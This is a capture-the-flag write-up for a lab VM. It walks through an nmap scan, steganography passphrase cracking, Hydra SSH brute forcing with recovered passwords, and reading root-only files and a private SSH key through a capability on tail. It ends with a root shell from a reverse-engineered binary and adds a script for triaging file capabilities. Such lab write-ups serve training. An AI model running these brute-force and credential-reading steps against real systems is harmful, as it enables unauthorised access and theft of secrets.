Information gathering
Host discovery
arp-scan -l
Port scan
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.254.27
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 03:44 EDT
Nmap scan report for 192.168.254.27
Host is up (0.00043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
2222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
MAC Address: 08:00:27:5B:90:01 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80
Two cat pictures, with a hint that something is hidden in them, so steganography is the obvious guess; download them all and run stegseek against each.
┌──(root㉿kali)-[~]
└─# stegseek '/home/kali/Desktop/Untitled'
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "Untitled.out".
┌──(root㉿kali)-[~/cat/1]
└─# stegseek '/home/kali/Desktop/Untitled.jpeg'
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "Untitled.jpeg.out".
The extracted text contains a number of names and password-looking strings, but nothing says which belongs to which account, so put them all into one wordlist and brute-force with it:
Matthew
sexymama
markus
Westlife
markuslovesbonita
thisismypassword
(saved as pass.txt)
Brute-force with Hydra, using the same file for both usernames and passwords:
┌──(root㉿kali)-[~]
└─# hydra -L pass.txt -P pass.txt ssh://192.168.254.27:2222
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-26 10:49:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 49 login tries (l:7/p:7), ~4 tries per task
[DATA] attacking ssh://192.168.254.27:2222/
[2222][ssh] host: 192.168.254.27 login: mateo password: thisismypassword
[2222][ssh] host: 192.168.254.27 login: markus password: markuslovesbonita
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-26 10:49:27
Getting a shell
With two valid accounts in hand, log in over SSH (port 2222) as each and enumerate.
mateo
mateo@twisted:~$ cat note.txt
/var/www/html/gogogo.wav
This points to an audio file that sounds like Morse code. Decoding it with a tool shows it is a fake, a decoy to waste time. Tsk.
markus
markus also has a note.txt; it points to an id_rsa that cat cannot read, so look for another way to get at it.
markus@twisted:~$ cat note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.
The usual enumeration step, listing file capabilities, shows that tail carries one:
/usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
This line means /usr/bin/tail has the cap_dac_read_search capability in its permitted and effective sets (+ep), so it is active as soon as the binary runs. cap_dac_read_search bypasses the discretionary read-permission check on files and the read/search check on directories; it does not grant write access (that would be cap_dac_override). In practice, tail can read any file on the system, including ones our user has no permission for.
So we can use this binary to read sensitive files directly, for example:
markus@twisted:/tmp$ tail /root/root.txt
HMVwhereismycat
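As an added example (not part of the original writeup), the following POSIX shell script does the triage step above in a repeatable way: it parses getcap output, flags the capabilities that let an unprivileged user read or write arbitrary files or escalate directly, and notes whether the capability is actually in the effective set. It also shows a whole-file read via tail that avoids the truncation risk of the tail -n 50 used later in this writeup. The sample getcap lines are constructed (the two from this box plus one invented python3 line), and the function names and severity reasons are my own choices.

```shell
#!/bin/sh
# Added example, not part of the original writeup.
# Triage `getcap -r / 2>/dev/null` output for file capabilities that let an
# unprivileged user read or write arbitrary files or escalate directly.
# The getcap lines below are constructed sample input so the script runs
# offline; on a target, pipe the real getcap output into flag_caps.

# Normalise both libcap output styles to "path caps":
#   old: /usr/bin/tail = cap_dac_read_search+ep
#   new: /usr/bin/tail cap_dac_read_search=ep
parse_line() {
    case $1 in
        *" = "*) printf '%s %s\n' "${1%% = *}" "${1#* = }" ;;
        *)       printf '%s\n' "$1" ;;
    esac
}

# Print why a capability string matters; return 1 if it is not interesting.
# cap_dac_override is checked first because it subsumes cap_dac_read_search.
reason_for() {
    case $1 in
        *cap_dac_override*)        echo "bypasses all DAC checks: read or write any file" ;;
        *cap_dac_read_search*)     echo "bypasses read/search checks: read any file (no write)" ;;
        *cap_setuid*|*cap_setgid*) echo "can switch to uid/gid 0 directly" ;;
        *cap_sys_admin*)           echo "near-root: mount, namespaces, etc." ;;
        *cap_sys_ptrace*)          echo "can attach to root-owned processes" ;;
        *cap_chown*|*cap_fowner*)  echo "can take over file ownership/permissions" ;;
        *) return 1 ;;
    esac
}

# stdin: getcap output; stdout: "path<TAB>caps<TAB>reason" per finding.
# A capability only applies automatically when it is in the Effective set
# ('e' after the + or =); a bare 'p' means the program must raise it itself.
flag_caps() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        set -- $(parse_line "$line")
        path=$1 caps=$2
        if why=$(reason_for "$caps"); then
            flags=${caps##*[+=]}
            case $flags in
                *e*) ;;
                *)   why="$why (not effective: program must raise it)" ;;
            esac
            printf '%s\t%s\t%s\n' "$path" "$caps" "$why"
        fi
    done
}

# With cap_dac_read_search on tail, dump a whole file. `-c +1` starts at the
# first byte, so a private key longer than 50 lines is not truncated the way
# `tail -n 50` would truncate it.
dump_file() { tail -c +1 "$1"; }

# Constructed sample: the two lines from this box plus an invented python3 line.
SAMPLE='/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
/usr/bin/python3 cap_setuid=p'

count_findings() { printf '%s\n' "$SAMPLE" | flag_caps | wc -l | tr -d ' '; }

printf '%s\n' "$SAMPLE" | flag_caps
```

On a live target replace the SAMPLE pipe with `/usr/sbin/getcap -r / 2>/dev/null | flag_caps`; ping's cap_net_raw is deliberately left unflagged because it is the normal Debian default and gives no file access.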
Privilege escalation
The same trick reads bonita's private key that markus's note pointed at:
tail -n 50 /var/cache/apt/id_rsa
This prints the last 50 lines of the file. Check that the output starts with the BEGIN line of the key; if the key is longer than 50 lines, raise the line count so nothing at the top is cut off. Then copy the key to the attacking machine and use it:
vi id_rsa
chmod 600 id_rsa
ssh -i id_rsa bonita@127.0.0.1 -p 2222
Running beroot as bonita just says root is required, so pull the binary down and analyse it. The analysis shows that entering 5880 makes it execute /bin/bash, which gives a root shell.
Key takeaways
- Enumerating file capabilities with /usr/sbin/getcap -r / 2>/dev/null
- Reverse analysis of a binary